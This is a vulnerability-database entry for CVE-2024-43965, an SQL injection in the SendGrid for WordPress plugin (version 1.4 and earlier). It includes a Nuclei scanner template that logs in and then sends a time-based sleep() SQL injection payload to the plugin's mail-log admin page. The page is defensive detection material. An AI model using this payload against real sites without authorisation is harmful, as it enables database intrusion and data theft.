Lucene search
+L

SendGrid for WordPress <= 1.4 - SQL Injection

🗓️ 07 Sep 2026 06:34:52Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

SendGrid for WordPress version 1.4 and earlier suffers an sql injection allowing arbitrary queries.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for SQL Injection in Smackcoders Sendgrid
14 Oct 202405:58
githubexploit
circl
Circl
CVE-2024-43965
29 Aug 202418:44
circl
cnnvd
CNNVD
WordPress plugin SendGrid for WordPress SQL注入漏洞
29 Aug 202400:00
cnnvd
cve
CVE
CVE-2024-43965
29 Aug 202415:23
cve
cvelist
Cvelist
CVE-2024-43965 WordPress SendGrid for WordPress plugin <= 1.4 - SQL Injection vulnerability
29 Aug 202415:23
cvelist
euvd
EUVD
EUVD-2024-40614
3 Oct 202520:07
euvd
kitploit
Kitploit
CVE-2024-43965
6 Sep 202615:19
kitploit
nvd
NVD
CVE-2024-43965
29 Aug 202416:15
nvd
osv
OSV
CVE-2024-43965
29 Aug 202416:15
osv
patchstack
Patchstack
WordPress SendGrid for WordPress Plugin <= 1.4 is vulnerable to SQL Injection
26 Aug 202400:00
patchstack
Rows per page
id: CVE-2024-43965

info:
  name: SendGrid for WordPress <= 1.4 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    Smackcoders SendGrid for WordPress [affected versions 1.4 and below] contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL queries, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to the latest version of SendGrid for WordPress, version 1.5 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-43965
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-sendgrid-mailer/sendgrid-for-wordpress-14-unauthenticated-sql-injection
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-43965
    epss-score: 0.02019
    epss-percentile: 0.79647
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 3
  tags: cve,cve2024,wordpress,wp,wp-plugin,sqli,wp-sendgrid-mailer,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /wp-admin/admin.php?page=wp-mailplus-logs&orderby=sent_time%2c(select*from(select(sleep(8)))a)&order=asc HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'duration >= 8'
          - 'contains_all(body, "wp-mailplus", "SendGrid")'
        condition: and
# digest: 490a0046304402204f8703ad4c45f0638a82e53f018f7bfb3619b419371f3078469c02da8ba90ccb02205111e6c5468b83fc51e200eed4e7f4c103eedc82c07a210b5da964609a2695d6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Feb 2026 19:19Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.18.2 - 9.8
EPSS0.02019
SSVC
20